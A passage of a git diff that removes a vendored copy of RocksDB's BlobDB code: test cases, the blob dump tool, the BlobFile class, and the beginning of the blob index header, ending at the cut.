-  options.env = mock_env_.get();
-  mock_env_->set_current_time(0);
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  std::map<std::string, KeyVersion> versions;
-  SequenceNumber first_non_ttl_seq = kMaxSequenceNumber;
-  SequenceNumber first_ttl_seq = kMaxSequenceNumber;
-  SequenceNumber last_non_ttl_seq = 0;
-  SequenceNumber last_ttl_seq = 0;
-  for (size_t i = 0; i < 1000; i++) {
-    bool is_small_value = rnd.Next() % 2;
-    bool has_ttl = rnd.Next() % 2;
-    uint64_t expiration = rnd.Next() % kMaxExpiration;
-    int len = is_small_value ? 50 : 200;
-    std::string key = "key" + ToString(i);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    std::string blob_index;
-    data[key] = value;
-    SequenceNumber sequence = blob_db_->GetLatestSequenceNumber() + 1;
-    if (!has_ttl) {
-      ASSERT_OK(blob_db_->Put(WriteOptions(), key, value));
-    } else {
-      ASSERT_OK(blob_db_->PutUntil(WriteOptions(), key, value, expiration));
-    }
-    ASSERT_EQ(blob_db_->GetLatestSequenceNumber(), sequence);
-    versions[key] =
-        KeyVersion(key, value, sequence,
-                   (is_small_value && !has_ttl) ? kTypeValue : kTypeBlobIndex);
-    if (!is_small_value) {
-      if (!has_ttl) {
-        first_non_ttl_seq = std::min(first_non_ttl_seq, sequence);
-        last_non_ttl_seq = std::max(last_non_ttl_seq, sequence);
-      } else {
-        first_ttl_seq = std::min(first_ttl_seq, sequence);
-        last_ttl_seq = std::max(last_ttl_seq, sequence);
-      }
-    }
-  }
-  VerifyDB(data);
-  VerifyBaseDB(versions);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(2, blob_files.size());
-  std::shared_ptr<BlobFile> non_ttl_file;
-  std::shared_ptr<BlobFile> ttl_file;
-  if (blob_files[0]->HasTTL()) {
-    ttl_file = blob_files[0];
-    non_ttl_file = blob_files[1];
-  } else {
-    non_ttl_file = blob_files[0];
-    ttl_file = blob_files[1];
-  }
-  ASSERT_FALSE(non_ttl_file->HasTTL());
-  ASSERT_EQ(first_non_ttl_seq, non_ttl_file->GetSequenceRange().first);
-  ASSERT_EQ(last_non_ttl_seq, non_ttl_file->GetSequenceRange().second);
-  ASSERT_TRUE(ttl_file->HasTTL());
-  ASSERT_EQ(first_ttl_seq, ttl_file->GetSequenceRange().first);
-  ASSERT_EQ(last_ttl_seq, ttl_file->GetSequenceRange().second);
-}
-
-TEST_F(BlobDBTest, CompactionFilterNotSupported) {
-  class TestCompactionFilter : public CompactionFilter {
-    virtual const char *Name() const { return "TestCompactionFilter"; }
-  };
-  class TestCompactionFilterFactory : public CompactionFilterFactory {
-    virtual const char *Name() const { return "TestCompactionFilterFactory"; }
-    virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-        const CompactionFilter::Context & /*context*/) {
-      return std::unique_ptr<CompactionFilter>(new TestCompactionFilter());
-    }
-  };
-  for (int i = 0; i < 2; i++) {
-    Options options;
-    if (i == 0) {
-      options.compaction_filter = new TestCompactionFilter();
-    } else {
-      options.compaction_filter_factory.reset(
-          new TestCompactionFilterFactory());
-    }
-    ASSERT_TRUE(TryOpen(BlobDBOptions(), options).IsNotSupported());
-    delete options.compaction_filter;
-  }
-}
-
-TEST_F(BlobDBTest, FilterExpiredBlobIndex) {
-  constexpr size_t kNumKeys = 100;
-  constexpr size_t kNumPuts = 1000;
-  constexpr uint64_t kMaxExpiration = 1000;
-  constexpr uint64_t kCompactTime = 500;
-  constexpr uint64_t kMinBlobSize = 100;
-  Random rnd(301);
-  mock_env_->set_current_time(0);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = kMinBlobSize;
-  bdb_options.disable_background_tasks = true;
-  Options options;
-  options.env = mock_env_.get();
-  Open(bdb_options, options);
-
-  std::map<std::string, std::string> data;
-  std::map<std::string, std::string> data_after_compact;
-  for (size_t i = 0; i < kNumPuts; i++) {
-    bool is_small_value = rnd.Next() % 2;
-    bool has_ttl = rnd.Next() % 2;
-    uint64_t expiration = rnd.Next() % kMaxExpiration;
-    int len = is_small_value ? 10 : 200;
-    std::string key = "key" + ToString(rnd.Next() % kNumKeys);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    if (!has_ttl) {
-      if (is_small_value) {
-        std::string blob_entry;
-        BlobIndex::EncodeInlinedTTL(&blob_entry, expiration, value);
-        // Fake blob index with TTL. See what it will do.
-        ASSERT_GT(kMinBlobSize, blob_entry.size());
-        value = blob_entry;
-      }
-      ASSERT_OK(Put(key, value));
-      data_after_compact[key] = value;
-    } else {
-      ASSERT_OK(PutUntil(key, value, expiration));
-      if (expiration <= kCompactTime) {
-        data_after_compact.erase(key);
-      } else {
-        data_after_compact[key] = value;
-      }
-    }
-    data[key] = value;
-  }
-  VerifyDB(data);
-
-  mock_env_->set_current_time(kCompactTime);
-  // Take a snapshot before compaction. Make sure expired blob indexes is
-  // filtered regardless of snapshot.
-  const Snapshot *snapshot = blob_db_->GetSnapshot();
-  // Issue manual compaction to trigger compaction filter.
-  ASSERT_OK(blob_db_->CompactRange(CompactRangeOptions(),
-                                   blob_db_->DefaultColumnFamily(), nullptr,
-                                   nullptr));
-  blob_db_->ReleaseSnapshot(snapshot);
-  // Verify expired blob index are filtered.
-  std::vector<KeyVersion> versions;
-  GetAllKeyVersions(blob_db_, "", "", &versions);
-  ASSERT_EQ(data_after_compact.size(), versions.size());
-  for (auto &version : versions) {
-    ASSERT_TRUE(data_after_compact.count(version.user_key) > 0);
-  }
-  VerifyDB(data_after_compact);
-}
-
-}  //  namespace blob_db
-}  //  namespace rocksdb
-
-// A black-box test for the ttl wrapper around rocksdb
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as BlobDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc b/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc
deleted file mode 100644
index b7ae816..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.cc
+++ /dev/null
@@ -1,222 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "utilities/blob_db/blob_dump_tool.h"
-#include <inttypes.h>
-#include <stdio.h>
-#include <iostream>
-#include <memory>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-BlobDumpTool::BlobDumpTool()
-    : reader_(nullptr), buffer_(nullptr), buffer_size_(0) {}
-
-Status BlobDumpTool::Run(const std::string& filename, DisplayType show_key,
-                         DisplayType show_blob) {
-  Status s;
-  Env* env = Env::Default();
-  s = env->FileExists(filename);
-  if (!s.ok()) {
-    return s;
-  }
-  uint64_t file_size = 0;
-  s = env->GetFileSize(filename, &file_size);
-  if (!s.ok()) {
-    return s;
-  }
-  std::unique_ptr<RandomAccessFile> file;
-  s = env->NewRandomAccessFile(filename, &file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-  if (file_size == 0) {
-    return Status::Corruption("File is empty.");
-  }
-  reader_.reset(new RandomAccessFileReader(std::move(file), filename));
-  uint64_t offset = 0;
-  uint64_t footer_offset = 0;
-  s = DumpBlobLogHeader(&offset);
-  if (!s.ok()) {
-    return s;
-  }
-  s = DumpBlobLogFooter(file_size, &footer_offset);
-  if (!s.ok()) {
-    return s;
-  }
-  if (show_key != DisplayType::kNone) {
-    while (offset < footer_offset) {
-      s = DumpRecord(show_key, show_blob, &offset);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-  return s;
-}
-
-Status BlobDumpTool::Read(uint64_t offset, size_t size, Slice* result) {
-  if (buffer_size_ < size) {
-    if (buffer_size_ == 0) {
-      buffer_size_ = 4096;
-    }
-    while (buffer_size_ < size) {
-      buffer_size_ *= 2;
-    }
-    buffer_.reset(new char[buffer_size_]);
-  }
-  Status s = reader_->Read(offset, size, result, buffer_.get());
-  if (!s.ok()) {
-    return s;
-  }
-  if (result->size() != size) {
-    return Status::Corruption("Reach the end of the file unexpectedly.");
-  }
-  return s;
-}
-
-Status BlobDumpTool::DumpBlobLogHeader(uint64_t* offset) {
-  Slice slice;
-  Status s = Read(0, BlobLogHeader::kSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogHeader header;
-  s = header.DecodeFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  fprintf(stdout, "Blob log header:\n");
-  fprintf(stdout, "  Version          : %" PRIu32 "\n", header.version);
-  fprintf(stdout, "  Column Family ID : %" PRIu32 "\n",
-          header.column_family_id);
-  std::string compression_str;
-  if (!GetStringFromCompressionType(&compression_str, header.compression)
-           .ok()) {
-    compression_str = "Unrecongnized compression type (" +
-                      ToString((int)header.compression) + ")";
-  }
-  fprintf(stdout, "  Compression      : %s\n", compression_str.c_str());
-  fprintf(stdout, "  Expiration range : %s\n",
-          GetString(header.expiration_range).c_str());
-  *offset = BlobLogHeader::kSize;
-  return s;
-}
-
-Status BlobDumpTool::DumpBlobLogFooter(uint64_t file_size,
-                                       uint64_t* footer_offset) {
-  auto no_footer = [&]() {
-    *footer_offset = file_size;
-    fprintf(stdout, "No blob log footer.\n");
-    return Status::OK();
-  };
-  if (file_size < BlobLogHeader::kSize + BlobLogFooter::kSize) {
-    return no_footer();
-  }
-  Slice slice;
-  *footer_offset = file_size - BlobLogFooter::kSize;
-  Status s = Read(*footer_offset, BlobLogFooter::kSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogFooter footer;
-  s = footer.DecodeFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  fprintf(stdout, "Blob log footer:\n");
-  fprintf(stdout, "  Blob count       : %" PRIu64 "\n", footer.blob_count);
-  fprintf(stdout, "  Expiration Range : %s\n",
-          GetString(footer.expiration_range).c_str());
-  fprintf(stdout, "  Sequence Range   : %s\n",
-          GetString(footer.sequence_range).c_str());
-  return s;
-}
-
-Status BlobDumpTool::DumpRecord(DisplayType show_key, DisplayType show_blob,
-                                uint64_t* offset) {
-  fprintf(stdout, "Read record with offset 0x%" PRIx64 " (%" PRIu64 "):\n",
-          *offset, *offset);
-  Slice slice;
-  Status s = Read(*offset, BlobLogRecord::kHeaderSize, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  BlobLogRecord record;
-  s = record.DecodeHeaderFrom(slice);
-  if (!s.ok()) {
-    return s;
-  }
-  uint64_t key_size = record.key_size;
-  uint64_t value_size = record.value_size;
-  fprintf(stdout, "  key size   : %" PRIu64 "\n", key_size);
-  fprintf(stdout, "  value size : %" PRIu64 "\n", value_size);
-  fprintf(stdout, "  expiration : %" PRIu64 "\n", record.expiration);
-  *offset += BlobLogRecord::kHeaderSize;
-  s = Read(*offset, key_size + value_size, &slice);
-  if (!s.ok()) {
-    return s;
-  }
-  if (show_key != DisplayType::kNone) {
-    fprintf(stdout, "  key        : ");
-    DumpSlice(Slice(slice.data(), key_size), show_key);
-    if (show_blob != DisplayType::kNone) {
-      fprintf(stdout, "  blob       : ");
-      DumpSlice(Slice(slice.data() + key_size, value_size), show_blob);
-    }
-  }
-  *offset += key_size + value_size;
-  return s;
-}
-
-void BlobDumpTool::DumpSlice(const Slice s, DisplayType type) {
-  if (type == DisplayType::kRaw) {
-    fprintf(stdout, "%s\n", s.ToString().c_str());
-  } else if (type == DisplayType::kHex) {
-    fprintf(stdout, "%s\n", s.ToString(true /*hex*/).c_str());
-  } else if (type == DisplayType::kDetail) {
-    char buf[100];
-    for (size_t i = 0; i < s.size(); i += 16) {
-      memset(buf, 0, sizeof(buf));
-      for (size_t j = 0; j < 16 && i + j < s.size(); j++) {
-        unsigned char c = s[i + j];
-        snprintf(buf + j * 3 + 15, 2, "%x", c >> 4);
-        snprintf(buf + j * 3 + 16, 2, "%x", c & 0xf);
-        snprintf(buf + j + 65, 2, "%c", (0x20 <= c && c <= 0x7e) ? c : '.');
-      }
-      for (size_t p = 0; p < sizeof(buf) - 1; p++) {
-        if (buf[p] == 0) {
-          buf[p] = ' ';
-        }
-      }
-      fprintf(stdout, "%s\n", i == 0 ? buf + 15 : buf);
-    }
-  }
-}
-
-template <class T>
-std::string BlobDumpTool::GetString(std::pair<T, T> p) {
-  if (p.first == 0 && p.second == 0) {
-    return "nil";
-  }
-  return "(" + ToString(p.first) + ", " + ToString(p.second) + ")";
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h b/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h
deleted file mode 100644
index abba91d..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_dump_tool.h
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <memory>
-#include <string>
-#include <utility>
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDumpTool {
- public:
-  enum class DisplayType {
-    kNone,
-    kRaw,
-    kHex,
-    kDetail,
-  };
-
-  BlobDumpTool();
-
-  Status Run(const std::string& filename, DisplayType key_type,
-             DisplayType blob_type);
-
- private:
-  std::unique_ptr<RandomAccessFileReader> reader_;
-  std::unique_ptr<char> buffer_;
-  size_t buffer_size_;
-
-  Status Read(uint64_t offset, size_t size, Slice* result);
-  Status DumpBlobLogHeader(uint64_t* offset);
-  Status DumpBlobLogFooter(uint64_t file_size, uint64_t* footer_offset);
-  Status DumpRecord(DisplayType show_key, DisplayType show_blob,
-                    uint64_t* offset);
-  void DumpSlice(const Slice s, DisplayType type);
-
-  template <class T>
-  std::string GetString(std::pair<T, T> p);
-};
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_file.cc b/thirdparty/rocksdb/utilities/blob_db/blob_file.cc
deleted file mode 100644
index 162f364..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_file.cc
+++ /dev/null
@@ -1,242 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#include "utilities/blob_db/blob_file.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
-
-#include <algorithm>
-#include <memory>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "util/filename.h"
-#include "util/logging.h"
-#include "utilities/blob_db/blob_db_impl.h"
-
-namespace rocksdb {
-
-namespace blob_db {
-
-BlobFile::BlobFile()
-    : parent_(nullptr),
-      file_number_(0),
-      has_ttl_(false),
-      compression_(kNoCompression),
-      blob_count_(0),
-      gc_epoch_(-1),
-      file_size_(0),
-      deleted_count_(0),
-      deleted_size_(0),
-      closed_(false),
-      obsolete_(false),
-      gc_once_after_open_(false),
-      expiration_range_({0, 0}),
-      sequence_range_({kMaxSequenceNumber, 0}),
-      last_access_(-1),
-      last_fsync_(0),
-      header_valid_(false) {}
-
-BlobFile::BlobFile(const BlobDBImpl* p, const std::string& bdir, uint64_t fn)
-    : parent_(p),
-      path_to_dir_(bdir),
-      file_number_(fn),
-      has_ttl_(false),
-      compression_(kNoCompression),
-      blob_count_(0),
-      gc_epoch_(-1),
-      file_size_(0),
-      deleted_count_(0),
-      deleted_size_(0),
-      closed_(false),
-      obsolete_(false),
-      gc_once_after_open_(false),
-      expiration_range_({0, 0}),
-      sequence_range_({kMaxSequenceNumber, 0}),
-      last_access_(-1),
-      last_fsync_(0),
-      header_valid_(false) {}
-
-BlobFile::~BlobFile() {
-  if (obsolete_) {
-    std::string pn(PathName());
-    Status s = Env::Default()->DeleteFile(PathName());
-    if (!s.ok()) {
-      // ROCKS_LOG_INFO(db_options_.info_log,
-      // "File could not be deleted %s", pn.c_str());
-    }
-  }
-}
-
-uint32_t BlobFile::column_family_id() const {
-  // TODO(yiwu): Should return column family id encoded in blob file after
-  // we add blob db column family support.
-  return reinterpret_cast<ColumnFamilyHandle*>(parent_->DefaultColumnFamily())
-      ->GetID();
-}
-
-std::string BlobFile::PathName() const {
-  return BlobFileName(path_to_dir_, file_number_);
-}
-
-std::shared_ptr<Reader> BlobFile::OpenSequentialReader(
-    Env* env, const DBOptions& db_options,
-    const EnvOptions& env_options) const {
-  std::unique_ptr<SequentialFile> sfile;
-  Status s = env->NewSequentialFile(PathName(), &sfile, env_options);
-  if (!s.ok()) {
-    // report something here.
-    return nullptr;
-  }
-
-  std::unique_ptr<SequentialFileReader> sfile_reader;
-  sfile_reader.reset(new SequentialFileReader(std::move(sfile)));
-
-  std::shared_ptr<Reader> log_reader =
-      std::make_shared<Reader>(db_options.info_log, std::move(sfile_reader));
-
-  return log_reader;
-}
-
-std::string BlobFile::DumpState() const {
-  char str[1000];
-  snprintf(str, sizeof(str),
-           "path: %s fn: %" PRIu64 " blob_count: %" PRIu64 " gc_epoch: %" PRIu64
-           " file_size: %" PRIu64 " deleted_count: %" PRIu64
-           " deleted_size: %" PRIu64
-           " closed: %d obsolete: %d expiration_range: (%" PRIu64 ", %" PRIu64
-           ") sequence_range: (%" PRIu64 " %" PRIu64 "), writer: %d reader: %d",
-           path_to_dir_.c_str(), file_number_, blob_count_.load(),
-           gc_epoch_.load(), file_size_.load(), deleted_count_, deleted_size_,
-           closed_.load(), obsolete_.load(), expiration_range_.first,
-           expiration_range_.second, sequence_range_.first,
-           sequence_range_.second, (!!log_writer_), (!!ra_file_reader_));
-  return str;
-}
-
-void BlobFile::MarkObsolete(SequenceNumber sequence) {
-  obsolete_sequence_ = sequence;
-  obsolete_.store(true);
-}
-
-bool BlobFile::NeedsFsync(bool hard, uint64_t bytes_per_sync) const {
-  assert(last_fsync_ <= file_size_);
-  return (hard) ? file_size_ > last_fsync_
-                : (file_size_ - last_fsync_) >= bytes_per_sync;
-}
-
-Status BlobFile::WriteFooterAndCloseLocked() {
-  ROCKS_LOG_INFO(parent_->db_options_.info_log,
-                 "File is being closed after footer %s", PathName().c_str());
-
-  BlobLogFooter footer;
-  footer.blob_count = blob_count_;
-  if (HasTTL()) {
-    footer.expiration_range = expiration_range_;
-  }
-
-  footer.sequence_range = sequence_range_;
-
-  // this will close the file and reset the Writable File Pointer.
-  Status s = log_writer_->AppendFooter(footer);
-  if (s.ok()) {
-    closed_ = true;
-    file_size_ += BlobLogFooter::kSize;
-  } else {
-    ROCKS_LOG_ERROR(parent_->db_options_.info_log,
-                    "Failure to read Header for blob-file %s",
-                    PathName().c_str());
-  }
-  // delete the sequential writer
-  log_writer_.reset();
-  return s;
-}
-
-Status BlobFile::ReadFooter(BlobLogFooter* bf) {
-  if (file_size_ < (BlobLogHeader::kSize + BlobLogFooter::kSize)) {
-    return Status::IOError("File does not have footer", PathName());
-  }
-
-  uint64_t footer_offset = file_size_ - BlobLogFooter::kSize;
-  // assume that ra_file_reader_ is valid before we enter this
-  assert(ra_file_reader_);
-
-  Slice result;
-  char scratch[BlobLogFooter::kSize + 10];
-  Status s = ra_file_reader_->Read(footer_offset, BlobLogFooter::kSize, &result,
-                                   scratch);
-  if (!s.ok()) return s;
-  if (result.size() != BlobLogFooter::kSize) {
-    // should not happen
-    return Status::IOError("EOF reached before footer");
-  }
-
-  s = bf->DecodeFrom(result);
-  return s;
-}
-
-Status BlobFile::SetFromFooterLocked(const BlobLogFooter& footer) {
-  // assume that file has been fully fsync'd
-  last_fsync_.store(file_size_);
-  blob_count_ = footer.blob_count;
-  expiration_range_ = footer.expiration_range;
-  sequence_range_ = footer.sequence_range;
-  closed_ = true;
-  return Status::OK();
-}
-
-void BlobFile::Fsync() {
-  if (log_writer_.get()) {
-    log_writer_->Sync();
-    last_fsync_.store(file_size_.load());
-  }
-}
-
-void BlobFile::CloseRandomAccessLocked() {
-  ra_file_reader_.reset();
-  last_access_ = -1;
-}
-
-std::shared_ptr<RandomAccessFileReader> BlobFile::GetOrOpenRandomAccessReader(
-    Env* env, const EnvOptions& env_options, bool* fresh_open) {
-  *fresh_open = false;
-  int64_t current_time = 0;
-  env->GetCurrentTime(&current_time);
-  last_access_.store(current_time);
-
-  {
-    ReadLock lockbfile_r(&mutex_);
-    if (ra_file_reader_) return ra_file_reader_;
-  }
-
-  WriteLock lockbfile_w(&mutex_);
-  if (ra_file_reader_) return ra_file_reader_;
-
-  std::unique_ptr<RandomAccessFile> rfile;
-  Status s = env->NewRandomAccessFile(PathName(), &rfile, env_options);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(parent_->db_options_.info_log,
-                    "Failed to open blob file for random-read: %s status: '%s'"
-                    " exists: '%s'",
-                    PathName().c_str(), s.ToString().c_str(),
-                    env->FileExists(PathName()).ToString().c_str());
-    return nullptr;
-  }
-
-  ra_file_reader_ = std::make_shared<RandomAccessFileReader>(std::move(rfile),
-                                                             PathName());
-  *fresh_open = true;
-  return ra_file_reader_;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_file.h b/thirdparty/rocksdb/utilities/blob_db/blob_file.h
deleted file mode 100644
index 4085cfe..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_file.h
+++ /dev/null
@@ -1,216 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <atomic>
-#include <memory>
-
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "util/file_reader_writer.h"
-#include "utilities/blob_db/blob_log_format.h"
-#include "utilities/blob_db/blob_log_reader.h"
-#include "utilities/blob_db/blob_log_writer.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-class BlobDBImpl;
-
-class BlobFile {
-  friend class BlobDBImpl;
-  friend struct blobf_compare_ttl;
-
- private:
-  // access to parent
-  const BlobDBImpl* parent_;
-
-  // path to blob directory
-  std::string path_to_dir_;
-
-  // the id of the file.
-  // the above 2 are created during file creation and never changed
-  // after that
-  uint64_t file_number_;
-
-  // If true, the keys in this file all has TTL. Otherwise all keys don't
-  // have TTL.
-  bool has_ttl_;
-
-  // Compression type of blobs in the file
-  CompressionType compression_;
-
-  // number of blobs in the file
-  std::atomic<uint64_t> blob_count_;
-
-  // the file will be selected for GC in this future epoch
-  std::atomic<int64_t> gc_epoch_;
-
-  // size of the file
-  std::atomic<uint64_t> file_size_;
-
-  // number of blobs in this particular file which have been evicted
-  uint64_t deleted_count_;
-
-  // size of deleted blobs (used by heuristic to select file for GC)
-  uint64_t deleted_size_;
-
-  BlobLogHeader header_;
-
-  // closed_ = true implies the file is no more mutable
-  // no more blobs will be appended and the footer has been written out
-  std::atomic<bool> closed_;
-
-  // has a pass of garbage collection successfully finished on this file
-  // obsolete_ still needs to do iterator/snapshot checks
-  std::atomic<bool> obsolete_;
-
-  // The last sequence number by the time the file marked as obsolete.
-  // Data in this file is visible to a snapshot taken before the sequence.
-  SequenceNumber obsolete_sequence_;
-
-  // should this file been gc'd once to reconcile lost deletes/compactions
-  std::atomic<bool> gc_once_after_open_;
-
-  ExpirationRange expiration_range_;
-
-  SequenceRange sequence_range_;
-
-  // Sequential/Append writer for blobs
-  std::shared_ptr<Writer> log_writer_;
-
-  // random access file reader for GET calls
-  std::shared_ptr<RandomAccessFileReader> ra_file_reader_;
-
-  // This Read-Write mutex is per file specific and protects
-  // all the datastructures
-  mutable port::RWMutex mutex_;
-
-  // time when the random access reader was last created.
-  std::atomic<std::int64_t> last_access_;
-
-  // last time file was fsync'd/fdatasyncd
-  std::atomic<uint64_t> last_fsync_;
-
-  bool header_valid_;
-
-  SequenceNumber garbage_collection_finish_sequence_;
-
- public:
-  BlobFile();
-
-  BlobFile(const BlobDBImpl* parent, const std::string& bdir, uint64_t fnum);
-
-  ~BlobFile();
-
-  uint32_t column_family_id() const;
-
-  // Returns log file's pathname relative to the main db dir
-  // Eg. For a live-log-file = blob_dir/000003.blob
-  std::string PathName() const;
-
-  // Primary identifier for blob file.
-  // once the file is created, this never changes
-  uint64_t BlobFileNumber() const { return file_number_; }
-
-  // the following functions are atomic, and don't need
-  // read lock
-  uint64_t BlobCount() const {
-    return blob_count_.load(std::memory_order_acquire);
-  }
-
-  std::string DumpState() const;
-
-  // if the file has gone through GC and blobs have been relocated
-  bool Obsolete() const {
-    assert(Immutable() || !obsolete_.load());
-    return obsolete_.load();
-  }
-
-  // Mark file as obsolete by garbage collection. The file is not visible to
-  // snapshots with sequence greater or equal to the given sequence.
-  void MarkObsolete(SequenceNumber sequence);
-
-  SequenceNumber GetObsoleteSequence() const {
-    assert(Obsolete());
-    return obsolete_sequence_;
-  }
-
-  // if the file is not taking any more appends.
-  bool Immutable() const { return closed_.load(); }
-
-  // we will assume this is atomic
-  bool NeedsFsync(bool hard, uint64_t bytes_per_sync) const;
-
-  void Fsync();
-
-  uint64_t GetFileSize() const {
-    return file_size_.load(std::memory_order_acquire);
-  }
-
-  // All Get functions which are not atomic, will need ReadLock on the mutex
-
-  ExpirationRange GetExpirationRange() const { return expiration_range_; }
-
-  void ExtendExpirationRange(uint64_t expiration) {
-    expiration_range_.first = std::min(expiration_range_.first, expiration);
-    expiration_range_.second = std::max(expiration_range_.second, expiration);
-  }
-
-  SequenceRange GetSequenceRange() const { return sequence_range_; }
-
-  void SetSequenceRange(SequenceRange sequence_range) {
-    sequence_range_ = sequence_range;
-  }
-
-  void ExtendSequenceRange(SequenceNumber sequence) {
-    sequence_range_.first = std::min(sequence_range_.first, sequence);
-    sequence_range_.second = std::max(sequence_range_.second, sequence);
-  }
-
-  bool HasTTL() const { return has_ttl_; }
-
-  void SetHasTTL(bool has_ttl) { has_ttl_ = has_ttl; }
-
-  CompressionType compression() const { return compression_; }
-
-  void SetCompression(CompressionType c) {
-    compression_ = c;
-  }
-
-  std::shared_ptr<Writer> GetWriter() const { return log_writer_; }
-
- private:
-  std::shared_ptr<Reader> OpenSequentialReader(
-      Env* env, const DBOptions& db_options,
-      const EnvOptions& env_options) const;
-
-  Status ReadFooter(BlobLogFooter* footer);
-
-  Status WriteFooterAndCloseLocked();
-
-  std::shared_ptr<RandomAccessFileReader> GetOrOpenRandomAccessReader(
-      Env* env, const EnvOptions& env_options, bool* fresh_open);
-
-  void CloseRandomAccessLocked();
-
-  // this is used, when you are reading only the footer of a
-  // previously closed file
-  Status SetFromFooterLocked(const BlobLogFooter& footer);
-
-  void set_expiration_range(const ExpirationRange& expiration_range) {
-    expiration_range_ = expiration_range;
-  }
-
-  // The following functions are atomic, and don't need locks
-  void SetFileSize(uint64_t fs) { file_size_ = fs; }
-
-  void SetBlobCount(uint64_t bc) { blob_count_ = bc; }
-};
-}  // namespace blob_db
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/blob_db/blob_index.h b/thirdparty/rocksdb/utilities/blob_db/blob_index.h
deleted file mode 100644
index fd91b54..0000000
--- a/thirdparty/rocksdb/utilities/blob_db/blob_index.h
+++ /dev/null
@@ -1,161 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/options.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-namespace blob_db {
-
-// BlobIndex is a pointer to the blob and metadata of the blob. The index is
-// stored in base DB as ValueType::kTypeBlobIndex.
-// There are three types of blob index:
-//
-//    kInlinedTTL:
-//      +------+------------+---------------+
-//      | type | expiration | value         |
-//      +------+------------+---------------+
-//      | char | varint64   | variable size |
-//      +------+------------+---------------+
-//
-//    kBlob:
-//      +------+-------------+----------+----------+-------------+
-//      | type | file number | offset   | size     | compression |
-//      +------+-------------+----------+----------+-------------+
-//      | char | varint64    | varint64 | varint64 | char        |
-//      +------+-------------+----------+----------+-------------+
-//
-//    kBlobTTL:
-//      +------+------------+-------------+----------+----------+-------------+
-//      | type | expiration | file number | offset   | size     | compression |
-//      +------+------------+-------------+----------+----------+-------------+
-//      | char | varint64   | varint64    | varint64 | varint64 | char        |
-//      +------+------------+-------------+----------+----------+-------------+
-//
-// There isn't a kInlined (without TTL) type since we can store it as a plain
-// value (i.e. ValueType::kTypeValue).
-class BlobIndex {
